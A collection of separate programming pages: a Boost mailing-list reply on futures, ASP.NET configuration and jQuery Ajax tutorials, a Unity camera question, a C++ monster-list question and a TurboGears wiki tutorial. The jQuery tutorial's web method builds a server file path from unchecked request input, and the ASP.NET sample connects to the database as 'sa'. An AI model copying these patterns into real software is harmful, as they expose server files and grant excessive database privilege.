    guardar <- button f [text := "Guardar", on command := do imagen <- varGet imv; salvarimagen f imagen]
...
    p <- panel f [clientSize := sz an al]
...
    set p [on paint := pintarect imv bimv var]
    where
      pintarect imv bimv var dc viewArea = do
        v <- varGet var
        ...
        randomcolours cl1 cl2 cl3 cl4 current
        curre <- varGet current
        drawRect dc (Rect 6 44 100 50) [penWidth := 6, brushColor := curre]
        bim <- bitmapCreateDefault
        dcDrawBitmap dc bim pointZero True
        if (v == 0)
          then do
            varSet bimv bim
            im <- imageCreateFromBitmap bim
            print v
            varSet imv im
            varSet var 1
          else do
            print v
            bim <- varGet bimv
            drawBitmap dc bim pointZero True []
        return ()

salvarimagen :: Dialog a -> Image a -> IO ()  -- This is the dialog for saving the image

Well, the code of pintarect has print statements and other things to help me with debugging. The function is supposed to draw random pictures; it's called with variables which will change in pintarect. I want them to stay the same across later paint events, but every time there is a paint event, the colours change. The other problem is that when I save the file, it's always empty. I suppose it's because dcDrawBitmap doesn't convert the dc to a bitmap; the name confused me. Is there any way to paint in the dc and save that to a file??? Thanks.
https://sourceforge.net/p/wxhaskell/mailman/wxhaskell-users/?viewmonth=200412&style=flat&viewday=13
Introduction

I don't need to tell most of you how important serialization is in your programs. If today is the first time you have come across the term serialization, I'd suggest reading up on it before continuing. Being able to serialize and deserialize information in your apps is a very important feature to have. Being able to save and load stored information is crucial. There are many ways to serialize data, but it all depends on your program's needs. You can serialize info into and from the registry; you can store and load info from a database, or from a file. Today we will save info to an XML file and load it from that XML file.

Design

We will be using a very basic design. Have a look at Figure 1, and design your form similar to it.

Figure 1 - Our Design

Coding

I decided that instead of serializing basic tidbits of data, I'd throw a spanner in the works and demonstrate how to save real objects created from code. For this demonstration we will create a new class called clsStudent and give it some properties. These properties will be the information we serialize. Let us add a new class now, and edit its code.

clsStudent

Add the necessary namespace(s), in General Declarations:

Imports System.Xml.Serialization 'The Serialization namespace contains classes that are used to serialize objects into XML format documents or streams

Now, let us add the Student class' member variables:

Private strName As String 'Name Member Variable
Private strCourse As String 'Course Member Variable
Private intStuNo As Integer 'StudentNumber Member Variable

The above member variables will be used in conjunction with our class' properties (which we will add now) to get and set their values. Let us add the properties now.
'Gets / Sets Student Name
Public Property StudentName() As String
    Get
        StudentName = strName
    End Get
    Set(ByVal Value As String)
        strName = Value
    End Set
End Property

'Gets / Sets Student's Course
Public Property StudentCourse() As String
    Get
        StudentCourse = strCourse
    End Get
    Set(ByVal Value As String)
        strCourse = Value
    End Set
End Property

'Gets / Sets StudentNumber
'Note: XML element names may not contain spaces, so "StudentNumber" is used here
<XmlElementAttribute(ElementName:="StudentNumber")> _
Public Property StudentNumber() As Integer
    Get
        StudentNumber = intStuNo
    End Get
    Set(ByVal Value As Integer)
        intStuNo = Value
    End Set
End Property

You can probably tell what the above code does. We simply give our Student class some properties. These properties include StudentName (for the student's name), StudentCourse (what course the student does) and StudentNumber (the student's student number). We need to connect our student class, and from there populate it with our form's controls. Finally, we must serialize and deserialize the entered info.

frmSD (or However You Named It)

Let us start with the namespaces again. I always start with the namespaces - old habits die hard, I suppose.
Add the following two namespaces to your form's General Declarations section:

Imports System.IO 'File Input & Output
Imports System.Xml.Serialization 'The Serialization namespace contains classes that are used to serialize objects into XML format documents or streams

Let us now add the serialization code:

Private Sub btnS_Click(sender As Object, e As EventArgs) Handles btnS.Click
    'Instantiate new Student object
    Dim stu As New clsStudent()
    'Information to save
    stu.StudentName = txtName.Text
    stu.StudentCourse = txtCourse.Text
    stu.StudentNumber = Convert.ToInt16(txtStuNum.Text)
    'Serialize student object to an XML file, via the use of StreamWriter
    Dim objStreamWriter As New StreamWriter("C:\StudentInfo.xml")
    Dim xsSerialize As New XmlSerializer(stu.GetType) 'Determine what object types are present
    xsSerialize.Serialize(objStreamWriter, stu) 'Save
    objStreamWriter.Close() 'Close File
End Sub

We created a new clsStudent object and populated it with whatever data was entered into the textboxes. Note: if you have named your objects differently, you will have to compensate for that in your code. We then created a StreamWriter object, which creates our file on the C drive, called StudentInfo.xml. We created an XmlSerializer object that facilitates the serializing of our data. Lastly, we wrote our entered data and closed the file.

Let us add the deserialization code:

Private Sub btnD_Click(sender As Object, e As EventArgs) Handles btnD.Click
    'Deserialize XML file to a new Student object.
    Dim objStreamReader As New StreamReader("C:\StudentInfo.xml") 'Read File
    Dim stu As New clsStudent() 'Instantiate new Student Object
    Dim xsDeserialize As New XmlSerializer(stu.GetType) 'Get Info present
    stu = xsDeserialize.Deserialize(objStreamReader) 'Deserialize / Open
    objStreamReader.Close() 'Close Reader
    'Display values of the new student object
    txtName.Text = stu.StudentName
    txtCourse.Text = stu.StudentCourse
    txtStuNum.Text = CStr(stu.StudentNumber)
End Sub

Same principle as the serialization, but we load the info with the help of the Deserialize method of the XmlSerializer object and put it into our textboxes. If you run your project now, you will be able to save your entered data, and then load it. I am including the source files below.

Conclusion

As always (you may say that I sound like a broken record sometimes - blame it on my O.C.D.), I hope you have enjoyed this little article, and that you have learned something from it. Until next time! Cheers!

- I always say that too...
http://mobile.codeguru.com/columns/vb/serializing-deserializing-objects-with-vb.net-2012.htm
Entity or other in ApplicationWindow

Hello, I'm trying to figure out how to show an entity with a mesh in the ApplicationWindow. First of all, I don't know if it can be done; I find nothing in the documentation. Could you help me or show me the right path? Thank you.

import QtQuick.Controls 1.4
import QtQuick 2.2 as QQ2
import Qt3D.Core 2.0
import Qt3D.Render 2.0
import Qt3D.Input 2.0
import Qt3D.Extras 2.0

ApplicationWindow {
    id: window
    visible: true
    menuBar: MenuBar {
        Menu {
            title: "File"
            MenuItem { text: "OpenFile" }
            MenuItem { text: "Close" }
        }
        Menu {
            title: "Edit"
            MenuItem { text: "Cut" }
            MenuItem { text: "Copy" }
            MenuItem { text: "Paste" }
        }
    }
    Entity {
        id: entityMesh
        ancor: //?????
    }
}

There are examples on how to use Qt3D included in Qt Creator. When you start Qt Creator, the topmost entry in the left views list (where Edit, Debug, etc. are) says Welcome. In there, click on Examples and search for 3D. There is, for example, the Qt 3D Materials QML example. This should get you started.

Good morning. I understand where to start, but I wanted to add the classic File -> OpenFile menu and I can't figure out how to integrate it in the window. I would like to put the menuBar in this project; how would you do that?
https://forum.qt.io/topic/87324/entity-or-other-in-apllicationwindow
That's What They Said The Office has been one of my all-time favorite shows since I caught the "Michael Scott's Dunder Mifflin Scranton Meredith Palmer Memorial Celebrity Rabies Awareness Pro-Am Fun Run Race for the Cure" episode back in 2007. It's absurdly quotable, it's lousy with memorable characters, and it's got one of the best finales I've seen of any show. Image('images/finale1.PNG') So imagine my delight when I stumble across a dataset cataloguing every single line of dialogue across its 9 seasons. I had to do a bit of data cleaning before I started tinkering around with it (GitHub link below), but ultimately it came out looking like this: df = do_all_data_loading() df.head() Where each row represents a line of dialogue, labeled by when it happened in the script and who spoke it. With the help of some simple text-parsing methods, we can better investigate this file for classic lines from the show. line_search(df, 'bears. beets. battlestar galactica') And filter down to the rows of data around them bbbg = get_dialogue(df, season=3, episode=20, scenes=[1, 4]) bbbg And print them for your captioning-convenience import textwrap for idx, row in bbbg.iterrows(): *_, quote, speaker = row print(speaker + ':') wrapper = textwrap.TextWrapper(initial_indent='\t', subsequent_indent='\t') print(wrapper.fill(quote)) j?! jim: Last week, I was in a drug store and I saw these glasses. Uh, four dollars. And it only cost me seven dollars to recreate the rest of the ensemble. And that's a grand total of... [Jim calculates the total on his calculator-watch] eleven dollars. dwight: You know what? Imitation is the most sincere form of flattery, so I thank you. [Jim places a bobble-head on his desk] Identity theft is not a joke, Jim! Millions of families suffer every year! jim: ... MICHAEL! dwight: Oh, that's funny. MICHAEL! YouTubeVideo(id='WaaANll8h18', width=500) Awesome. 
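The helpers used throughout (do_all_data_loading, line_search, get_dialogue, and friends) live in the linked GitHub repo and aren't shown in the post. As a rough idea of what line_search does, here's a hypothetical pure-Python stand-in over a list of (speaker, line) rows; the real one presumably filters a pandas DataFrame the same way, case-insensitively:

```python
import re

# Toy stand-in for the dialogue table: one (speaker, line) tuple per row.
rows = [
    ("jim", "Bears. Beets. Battlestar Galactica."),
    ("dwight", "Identity theft is not a joke, Jim!"),
    ("michael", "That's what she said!"),
]

def line_search(rows, pattern):
    """Return the rows whose dialogue matches `pattern`, ignoring case."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [(speaker, line) for speaker, line in rows if rx.search(line)]

print(line_search(rows, "bears. beets. battlestar galactica"))  # the Jim row
print(line_search(rows, r"that's what she said"))               # the Michael row
```

Since the pattern is treated as a regex, searches like '\*' for censored profanity fall out of the same helper for free.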
Given that the show aired on NBC, it's a safe bet that hard searching for F-Bombs and other usual suspects will be fruitless. However, if we instead do a search for asterisks, as it would show up in the script, we can get to the bottom of who's got the foulest mouth at Dunder-Mifflin. profanity = line_search(df, '\*') profanity['speaker'].value_counts() kevin 2 michael 2 kelly 1 deangelo 1 oscar 1 darryl 1 phyllis 1 jo 1 pam 1 toby 1 brandon 1 andy 1 robert 1 ryan 1 Name: speaker, dtype: int64 By the by, I'd highly encourage looking these up-- this show makes excellent use of the censor bleep, IMO profanity Digging around for specific words also yielded some surprising results. For instance, that Meredith is, curiously, only the sixth-highest user of the word "Drink" line_search(df, 'drink')['speaker'].value_counts().head(6) michael 38 dwight 22 jim 19 pam 12 andy 10 meredith 9 Name: speaker, dtype: int64 Image('images/meredith.jpg') Or that Michael spends as much time putting his foot in his mouth about gay culture as the only gay character spends talking about it. line_search(df, 'gay')['speaker'].value_counts().head() oscar 31 michael 31 dwight 17 andy 15 pam 8 Name: speaker, dtype: int64 And less-surprising, is that Andy is far and away the biggest user of the word 'Tuna'. line_search(df, 'tuna')['speaker'].value_counts() andy 63 jim 13 dwight 9 michael 7 walter jr 2 erin 2 kevin 2 holly 2 gabe 2 mark 1 both 1 david wallace 1 creed 1 angela 1 robert 1 front desk clerk 1 kelly 1 Name: speaker, dtype: int64 Of course, the best and most obvious use of our ability to zero-in on keywords in every script is to run some numbers on Michael's many, many "That's what she said" jokes. His track record of often-ill-timed, always-inappropriate innuendos began early in the second season of the show and lasted consistently through his tenure on The Office, cresting in perhaps the dumbest, most-touching context the joke will ever see. 
First, let's get ahold of each instance of the phrase twss = line_search(df, 'that\'s what she said') twss = twss[twss['speaker'] == 'michael'] twss A respectible 23 times. It's also worth a nod to the fact that on at least 13 occasions, someone else shared Michael's burden. copycats = line_search(df, 'that\'s what she said') copycats = copycats[copycats['speaker'] != 'michael'] len(copycats) 13 And that when we do a similar search on 'he' instead of 'she', we've shared the love 4 times. twhs = line_search(df, 'that\'s what he said') len(twhs) 4 One thing I was curious about, though, was who was teeing Michael up for these jokes. Getting at that was easy enough. We already have each row of data that he says it. All we have to do is grab the row right before it. Your leaderboard: df.loc[twss.index - 1]['speaker'].value_counts() jim 5 michael 3 lester 3 jan 2 kevin 1 holly 1 angela 1 darryl 1 pam 1 second cindy 1 phyllis 1 gabe 1 andy 1 dwight 1 Name: speaker, dtype: int64 Unsurprisingly, Michael sets himself up often (and astute readers will have noticed that some lines above have him doing just that within the span of a sentence or two.) But who's Lester? A bit of poking around, and it turns out that Lester is the name of the attourney that was deposing him in season 4, lol YouTubeVideo('ClzJkv3dpY8', start=240, end=288, width=500) Another interesting avenue within the text data is looking at how vocabulary changes character-to-character. If you've ever seen these two interact, it wouldn't surprise you to learn that Michael's firey hatred for his colleague in HR comes with a good deal of engendered language. And not just the word "No." (when he learns that Toby has abruptly come back to work after being away for a season). YouTubeVideo('NHh0rf0ojEc', width=500) And so here, I found every line that Michael delivered within a line or two from Toby. 
# sample the first few records michaelToToby = df[a_spoke_after_b(df, 'michael', 'toby')] michaelToToby.head() Then I extracted all of the unique words that he used throughout the course of the show when speaking to or shortly after him michaelsWordsToToby = set(extract_corpus(michaelToToby)) print(len(michaelsWordsToToby), 'unique words') 1222 unique words Then, I grabbed every line that Michael said after people that he liked. Most notably, his lovers... work friends... daughter-figures... Ryan. And I compiled every unique word that he uses with them. peopleMichaelLikes = ['ryan', 'jim', 'dwight', 'pam', 'holly', 'darryl', 'erin', 'oscar', 'david', 'jan'] niceWords = set() for person in peopleMichaelLikes: michaelToPerson = df[a_spoke_after_b(df, 'michael', person)] niceWords = niceWords.union(set(extract_corpus(michaelToPerson))) print(len(niceWords), 'unique words') 7680 unique words This allowed me to generate words that Michael uniquely uses in reaction to someone he hates so damn much... "If I had a gun with two bullets and was in a room with Hitler, Bin Laden, and Toby, I would shoot Toby twice." -Michael Scott ...that he's never used with anyone else on the show. 
print(michaelsWordsToToby - niceWords) {'jerk-face', 'nutcases', 'retarded', 'souls', 'shaolin', 'lift', 'heartwarming', 'dawg', 'work-associated', 'assuming', 'culturally', 'principles', 'inferring', 'sream', 'molest', 'slepping', 'twisted', 'binder', 'mediators', 'welcoming', 'smack', 'mornin', 'pufnstuf', 'imploring', 'insisting', 'temple', 'bored', 'pitcher', 'grimaces', 'farting', 'immature', 'shine', 'icebreaker', 'retards', 'creedstanley', 'status', 'anti-christ', 'aaaah', 'benefit', 'zip', 'throats', 'climate', 'meantime', 'interruption', 'influence', 'heartless', 'plague', 'racist', 'anticipation', 'disorder', 'overstating', 'infected', 'mamas', 'balers', 'neve', 'punishment', 'noun', 'overstaying', 'sassy', 'committed', 'beeps', 'jeff', 'sweating', 'dealt', 'virus', 'joshin', 'heh', 'whomevers', 'resistance', 'radon', 'borientationtalks', 'affecting', 'gives-what-what', 'chosen', 'erics', 'lobster', 'interim', 'nigeria', 'crumbles', 'horribleness', 'cutie-pie', 'primary', 'includes', 'snail', 'powerful', 'doll', 'veterinarian', 'affective', 'lamaze', 'director', 'pretended', 'soulless', 'tan', 'flashed', 'insists', 'nile', 'seasonal', 'styles', 'taxpayer', 'villages', 'counseling', 'air-condition---', 'goal', 'slack', 'relatively', 'explicit', 'images', 'involving', 'abraham', 'freedoms', 'uncalled', 'stutter', 'cutoff', 'collect', 'psychological', 'ads', 'probed', 'fatigue', 'agenda-actually', 'pukeys', 'justdrag', 'red-headed', 'caprese', 'exhalesi', 'all-in', 'legitimate', 'pagers', 'alcoholic', 'perv', 'donut', 'verdict', 'hammer', 'carpools', 'discreet', 'witty', 'answered', 'progress', 'undergoing', 'rightful', 'charming', 'meenie', 'been--', 'nuisance', 'wha-wha-wha-wha-what', 'redacted', 'peas', 'psych', 'shifting', 'counselor', 'alf', 'pristine', 'nyeh', 'failure', 'mothers', 'miney', 'unlocks', 'despite', 'squat', 'cruisin', 'mutiny', 'irritability', 'eeny', 'jerky', 'crabs', 'opener', 'air-conditioner', 'flasher', 'alien', 'foliage', 'select', 
'skull', 'kills', 'boredom', 'slate', 'cop', 'aaaahhh', 'disrespectful', 'bruisin', 'bedpost', 'tested', 'albeit', 'blow-up', 'whisper', 'winnings', 'puppet', 'beaches', 'respected', 'conflict', 'smelly', 'conflictin', 'biologically', 'comedic', 'fortunate', 'yanks', 'pulp', 'campbell', 'quitter', 'instructed', 'pukey', 'bent', 'steeped', 'inception', 'towel', 'cornerstone', 'peed', 'blabbering', 'notches', 'donuts'} All of the source code for this post can be found at
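a_spoke_after_b isn't shown in the post either. From how it's described ("within a line or two"), it plausibly flags rows where speaker a talks shortly after speaker b. A guessed stand-in over a plain list of speakers, returning indices instead of a pandas mask:

```python
def a_spoke_after_b(speakers, a, b, window=2):
    """Indices where `a` speaks within `window` lines after `b` spoke.
    A guess at the notebook's helper, over a plain list of speakers."""
    hits = []
    for i, s in enumerate(speakers):
        if s != a:
            continue
        recent = speakers[max(0, i - window):i]
        if b in recent:
            hits.append(i)
    return hits

speakers = ["toby", "michael", "pam", "toby", "jim", "michael"]
print(a_spoke_after_b(speakers, "michael", "toby"))  # [1, 5]
```

Applied to the full script, that index set is exactly what the "Michael's words to Toby" extraction above filters on.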
https://napsterinblue.github.io/blog/2018/05/15/thats-what-they-said/
CC-MAIN-2021-04
refinedweb
1,435
55.88
Results 1 to 3 of 3 - Join Date - Sep 2013 - Location - Accra,Ghana - 10 - Thanks - 0 - Thanked 0 Times in 0 Posts Generating a unique Serial Key in java i have a table ITEMS which has these columns and data Code: Description = Lands & Building Description_Code= LB(001) i also have another table BRANCHES which has these columns and data Branch_Area=Labone Branch_Code=LB(001) example is FC/LB/100/LB/001 Any directions or help will be appreciated THANK YOU - Join Date - Sep 2010 - 2,451 - Thanks - 17 - Thanked 275 Times in 275 Posts Strictly speaking, you want to generate a unique identifier, which you can probably do just by hashing that combination with any number of algorithms. A serial number is a consecutive number assigned in time order. Code: - Join Date - Dec 2013 - 5 - Thanks - 0 - Thanked 0 Times in 0 Posts import java.util.Date; public class IdUniqueHelper { private static final String ALPHABET = "ABC"; private static final long BASE = 36; private static final String DIGIT = "0123456789"; public static String encode(long num) { StringBuilder sb = new StringBuilder(); while (num > 0) { sb.append(ALPHABET.charAt((int) (num % BASE))); num /= BASE; } return sb.reverse().toString(); } public static String getId() { Date date = new Date(); String id = encode(date.getTime()); return id; } } AdSlot6
http://www.codingforums.com/java-and-jsp/304222-generating-unique-serial-key-java.html?s=e7eccc4e824efd422db39ed355ffe249
CC-MAIN-2015-40
refinedweb
210
52.53
This is a java program to find the mode of a set. The mode of a set is defined as the highest occurring element in the set. We count the occurrence of each of the element and print the element whose count is highest. Here is the source code of the Java Program to Find the Mode in a Data Set. The Java program is successfully compiled and run on a Windows system. The program output is also shown below. //This is a java program to find the mode for a given sequence of numbers import java.util.Random; public class Mode { static int N = 20; static int[] sequence = new int[N]; public static int mode() { int maxValue = 0, maxCount = 0; for (int i = 0; i < sequence.length; ++i) { int count = 0; for (int j = 0; j < sequence.length; ++j) { if (sequence[j] == sequence[i]) ++count; } if (count > maxCount) { maxCount = count; maxValue = sequence[i]; } } return maxValue; } public static void main(String args[]) { Random random = new Random(); for (int i = 0; i < N; i++) sequence[i] = Math.abs(random.nextInt(100)); System.out.println("The set of numbers are: "); for (int i = 0; i < N; i++) System.out.print(sequence[i] + " "); System.out.println("\nThe mode of the set is: " + mode()); } } Output: $ javac Mode.java $ java Mode The set of numbers are: 85 3 80 56 37 47 13 11 94 38 6 12 10 31 52 67 81 98 43 37 The mode of the set is: 37 Sanfoundry Global Education & Learning Series – 1000 Java Programs. Here’s the list of Best Reference Books in Java Programming, Data Structures and Algorithms.
http://www.sanfoundry.com/java-program-find-mode-data-set/
CC-MAIN-2017-04
refinedweb
271
62.17
Fourth MSFTCorpDojo today. MineSweeper and MicroPairing this time too.This time we, as a result of the retrospect from last time, we did BDD-style testing (I’ve added one of the test classes below as an example). We decided to start by implementing a parser that parsed the input and created an internal representation of the input that we could later use to generate the output. By the end of the session we had a pretty complete parser with error handling for all kinds of bad input. This is one of the few times I’ve seen any real error handling in a dojo. This time in the retrospect we said that the next time we should implement the other part next time. That is; assume a parsed input in some internal representation and generate the output from that. We also talked about how we do MicroPairing and switch one person in the pair every seven minutes. We decided to next time switch one person in the pair every time the keyboard gets passed instead. Guess that will mean less pair programming since there is no real ping-pong but rather a circular queue. But in our session almost everybody participates all the time anyway so that might not necessarily be a problem. 1: public class Given_a_single_1x1_fieldset_with_no_bombs 2: { 3: private string input; 4: private Field field; 5: 6: public Given_a_single_1x1_fieldset_with_no_bombs() 7: { 8: input = “1 1” + Environment.NewLine + 9: “.” + Environment.NewLine + 10: “0 0”; 11: field = FieldParser.Parse(input).Single(); 12: } 13: 14: [Fact] 15: public void It_should_have_one_row() 16: { 17: Assert.Equal(1, field.Rows); 18: } 19: 20: [Fact] 21: public void It_should_have_one_column() 22: { 23: Assert.Equal(1, field.Columns); 24: } 25: 26: [Fact] 27: public void It_should_have_an_empty_square_0_0() 28: { 29: Assert.False(field.IsBomb(0, 0)); 30: } 31: }
https://blogs.msdn.microsoft.com/cellfish/2009/08/06/coding-dojo-4/
CC-MAIN-2017-26
refinedweb
298
64.3
React uses two types of components: functional and class. The former is equivalent to JavaScript functions while the latter corresponds with JS classes. Functional components are simpler because they are stateless, and React encourages using of this type. At the same time, React creators recommend writing functional components as pure functions, meaning that any state change should be handled outside the component itself. You may encounter components that hold information that affects their rendering, but you don’t want that data to be available for the entire application. In other words, you want to keep the state local and manage it in isolation within that component. Adding state to functional components If you choose to use class components, things are pretty straightforward because they have state built-in. However, if you opt for functional components due to their simplicity, the only way to add state is to use hooks. Let’s say your application consists mostly of functional components and at a later point you realize that you need state in some components. Instead of refactoring the code, you can use a hook such as useState. Hooks don’t work inside class components. Here’s a comparison between a functional component with the useState hook and a class component with built-in state. 
Functional component:> ); } Here’s the same component, but written as a class: import React, { Component } from "react"; import "./styles.scss"; export default class App extends Component { constructor(props) { super(props); this.state = { size: "default", message: "Default font size" }; } changeBig = () => { this.setState({ size: "big", message: "big" }); }; changeSmall = () => { this.setState({ size: "small", message: "small" }); }; render() { return ( <div className="App"> <p onClick={this.changeBig}>Make the text big</p> <p onClick={this.changeSmall}>Make the text small</p> <div> <h3>Change the font size by pressing a button</h3> </div> <div className={`box ${this.state.size}`}>{this.state.message}</div> </div> ); } } It’s quite clear that the functional component is easier to write and handle be cause it has fewer lines of code and you can just “hook in” and add state as needed. The challenge with this approach is that your stateless component won’t be able to mimic the state change by itself. Because the hooks are internal, you won’t be able to call them. So if you want to test the behavior of this component, you’ll need a function that triggers the state change. This function has to meet two additional requirements: it should be available as a prop of the component and make use of a mocked event. With this in place, you can test whether the state has been updated by looking for its side effects, such as an update in the props of the rendered component. Enough theory — let’s see this in practice! We’ll test the functional component from above with Jest and Enzyme. Building the demo component in React We’ll render a component that changes the size of the font when you press one of the buttons. 
In the App.js file, add the following code.> ); } Then, in the style.scss file, add this code: .App { font-family: sans-serif; text-align: center; } p { background-color: transparent; color: black; border-radius: 2rem; padding: 0.5rem 2rem; border: 1px solid; margin-right: 0.25rem; display: inline-block; &:hover { background-color: black; color: white; } } .box { background-color: rgb(245, 244, 244); height: 100px; width: 200px; padding: 20px; margin: 20px auto; display: flex; align-content: center; justify-content: center; align-items: center; } .default { font-size: 18px; color: blue; background-color: rgb(219, 245, 255); } .big { font-size: 48px; color: red; background-color: rgb(247, 233, 235); } .small { font-size: 14px; font-weight: bold; color: green; background-color: rgb(219, 255, 219); } When you press the first button, the font size increases. In the same way, when you press the second button, the font size decreases. For this simple application, we want to first test that the component is rendered correctly, and then we’ll test the change in the class name that is supposed to occur after the onClick event. Adding Jest and Enzyme to the project Before writing the tests, let’s clarify why we need both of these tools. Jest and Enzyme are similar, but they’re used for slightly different purposes. They can both perform unit tests, but Jest is a fully featured testing framework, meaning it provides an assertion library to help you test your entire application. Jest tests the components mainly through snapshots, by comparing the output of a rendered component to the saved HTML snapshot. When the two correspond, the test passes, but if the rendered output is different than the snapshot, Jest raises a test failure. The issue with snapshot testing in Jest is that whenever you change even one line of code, you need to repeat the snapshots, then compare the HTML outputs line by line to see what changed. 
Enzyme solves this issue by providing APIs that examine the components and return a failure or passed response. In this exercise, we’ll use Enzyme and Jest together to keep tests simpler. We’ll create a single test file where we’ll add our configurations, but in a real-life project, it’s good practice to keep these separated. Let’s first add Jest and Enzyme as dependencies. The next step is to create a new file for the test and name it App.test.js. import React from "react"; import Adapter from "enzyme-adapter-react-16"; import { shallow, configure } from "enzyme"; import App from "./App"; configure({ adapter: new Adapter() }); describe("App", () => { it("renders correctly", () => { shallow(<App />); }); }); The imports are needed for Enzyme tests to work properly with React in this exercise. If we look at the syntax of the test, we see that it uses some keywords: describebreaks down a test suite into multiple smaller tests. You can nest multiple describestatements if you want to divide the tests even more itdescribes a single test. In other words, itexplains what the component should do. This statement can’t be nested shallowrenders a single component, without including its children, so it’s perfect for rendering isolated components and performing pure unit tests Now let’s run this first test and see if the component renders correctly. What if we change the class name for the small, green font and use default? Let’s see what happens when we change the code and run the test again. The test still passes, even if the behavior is not correct, because we’re not testing the behavior with this type of test. Let’s do one more exercise before testing the functionality and check whether the rendered component includes two paragraphs. 
In the App.test.js file, I’ve adjusted the code as follows: import React from "react"; import Adapter from "enzyme-adapter-react-16"; import { shallow, configure } from "enzyme"; import App from "./App"; configure({ adapter: new Adapter() }); describe("App", () => { it("renders correctly", () => { shallow(<App />); }); it("includes two paragraphs", () => { const wrapper = shallow(<App />); expect(wrapper.find("p").length).toEqual(2); }); }); Now we’re checking whether the rendered component finds two paragraphs. Indeed, the test passes. Finally, let’s test the actual functionality of the app and see if the state changes on click. We’ll mock a function for this and write the test as follows. it("should update state on click", () => { const changeSize = jest.fn(); const wrapper = mount(<App onClick={changeSize} />); const handleClick = jest.spyOn(React, "useState"); handleClick.mockImplementation(size => [size, changeSize]); wrapper.find("#para1").simulate("click"); expect(changeSize).toBeTruthy(); }); Here, we’re first defining a mock function, changeSize = jest.fn(). This function adjusts the state of the component and is called in the handleClick function. We’re using the jest.spyOn() function, which has the following syntax: jest.spyOn(object, methodName) This function creates a mock function similar to jest.fn while tracking the calls to the object’s method ( methodName). So we’re testing to validate whether calling this function actually calls the useState hook (function). If useState is called, when we simulate the click on the #para1 (first paragraph), we should get a truthy value for the changeSize function. When we run the tests, we see that this one passes as well. I hope this guide gives you an idea of how to test your React functional components. In particular, I hope you come away with a better understanding of the state changes for components that use hooks, with Jest and Enzyme as testing libraries. 
"Testing state changes in React functional components": with this approach we need to interact with the component's DOM and simulate events, which feels like an E2E test to me. I feel uncomfortable seeing `find` in unit tests. What do you say?
https://blog.logrocket.com/testing-state-changes-in-react-functional-components/
About Art N Peace (Rank: Member, Community Reputation: 148, Neutral)

- Hey, I'll need you to accept my friend add on Skype if you're still interested in joining the team.
- Thanks again, Karsten. I knew what the repositories did, but I didn't understand why one seemed suddenly more popular than the other right now. Also, WebSVN worked perfectly. Had it up and running in 2 minutes!
- Thanks a lot, Karsten. I was wondering if there were any simpler alternatives and I wasn't aware of these. I think I'll give them a go. But maybe you can answer another question? What's the difference between Git and SVN? I had wanted to try GitHub instead of SVN, but I also couldn't configure that thing either, though I got much further than I did with Trac.

Art N Peace replied to patisake's topic in For Beginners:
As a straight-up noob, I use Orwell Dev C++. I wanted to use something more substantial/long-term like NetBeans or VS, but I couldn't get them set up properly. Not newbie-friendly at all: I had to download other pieces of software, install them, and set them up in the IDE... and I just barely understand what an IDE is, so I gave it up for now and went with Dev C++. It's plug and play. All the advice here so far is great, though. Thanks, everyone.

Art N Peace replied to Art N Peace's topic in For Beginners:
I think I figured it out, though I still don't understand what exactly happened. There was a file which the IDE made by default called main.cpp. Based on the reading of the error, which referenced that file, it was somehow being included in the compile process along with gameover.cpp. I don't know why. I deleted main.cpp and the code ran perfectly. It would be nice to understand what that error means, though. Thanks.

Art N Peace posted a topic in For Beginners:
I'm using an old book that teaches programming and I keep getting an error that I don't understand.
The book is *Beginning C++ Game Programming* by Michael Dawson. I've tried running the code in Dev-C++ and the NetBeans IDE. No luck. I'm wondering if the lesson code within is dated (the book is old, 2004)? Here's the program I'm trying to run:

```cpp
#include <iostream>
using namespace std;

int main()
{
    cout << "Game Over!" << endl;
    return 0;
}
```

Here's the error I'm getting:

```
build/Debug/Cygwin-Windows/main.o: In function `main':
/cygdrive/c/Users/User2/Documents/NetBeansProjects/cppLessons/main.cpp:15: multiple definition of `_main'
build/Debug/Cygwin-Windows/gameover2.o:/cygdrive/c/Users/User2/Documents/NetBeansProjects/cppLessons/gameover2.cpp:16: first defined here
collect2: ld returned 1 exit status
make[2]: *** [dist/Debug/Cygwin-Windows/cpplessons.exe] Error 1
make[1]: *** [.build-conf] Error 2
make: *** [.build-impl] Error 2
BUILD FAILED (exit value 2, total time: 3s)
```

What does this mean and how do I fix it? Thank you for your help.

Art N Peace posted a topic in General and Gameplay Programming (Unity):
I'm in the process of selecting a game engine for development of a game. Two engines have piqued my interest: Gamestudio and Unity 3. In terms of ease of use, learning curve, versatility, and capability, what do you coders who have used these engines think? I am just looking for feedback from people who have used these engines and want to know how they felt about them. I don't know a great deal about engines, but I do know what I want and need from one. How does Gamestudio pan out? Unity 3?

Hoping to finally get my own game project going! I'm sticking with it no matter how long it takes... but, uh, hopefully not too long :D

Art N Peace reviewed GameDev.net Admin's article in General and Gameplay Programming.
https://www.gamedev.net/profile/179309-art-n-peace/?tab=classifieds
Subject: Re: [boost] Futures (was: Re: [compute] Some remarks)
From: Niall Douglas (s_sourceforge_at_[hidden])
Date: 2015-01-12 10:30:29

On 7 Jan 2015 at 12:40, Thomas Heller wrote:

> > What is missing on POSIX is a portable universal kernel wait object
> > used by everything in the system. It is correct to claim you can
> > easily roll your own with a condition variable and an atomic; the
> > problem comes in when one library (e.g. OpenCL) has one kernel wait
> > object and another library has a slightly different one, and the two
> > cannot be readily composed into a single wait_for_all() or
> > wait_for_any() which accepts all wait object types, including
> > non-kernel wait object types.
>
> Exactly, this could be easily achieved by defining an appropriate API for the
> shared state of asynchronous operations; the wait functions would then just
> use the async result objects, which in turn use the wait functionality as
> implemented in the shared state.

You still seem to be assuming the existence of a shared state in wait objects :(

I suppose it depends on how you define a shared state, but for that non-allocating design of mine the (a better name) "notification target" is the promise if get_future() has never been called, and the future if get_future() has ever been called. The notification target is kept by an atomic pointer: if it is set, it points at a future somewhere; if it is null, then either the promise is broken or the target is the promise.

> A portable, universal kernel wait object is
> not really necessary for that.

I think a portable, universal C API kernel wait object is very necessary if C++ is to style itself as a first-tier systems programming language. We keep trivialising C compatibility, and we should not.

> Not everyone wants to pay for the cost of a
> kernel transition.

You appear to assume a kernel transition is required.
My POSIX permit object can CAS-lock spin up to a certain limit before even considering acquiring a kernel wait object at all, which I might add preferentially comes from a user-side recycle list where possible. So if the wait period is very short, no kernel transition is required; indeed, you don't even call malloc.

That said, its design is highly limited to doing what it does because it has to make hard-coded conservative assumptions about its surrounding environment. It can't support coroutines, for example, and the fairness implementation does make it quite slow compared to a CAS lock because it can't know if fairness is important or not, so it must assume it is. Still, this is a price you need to pay if you want a C API which cannot take template specialisations.

> This is an implementation detail of a specific future
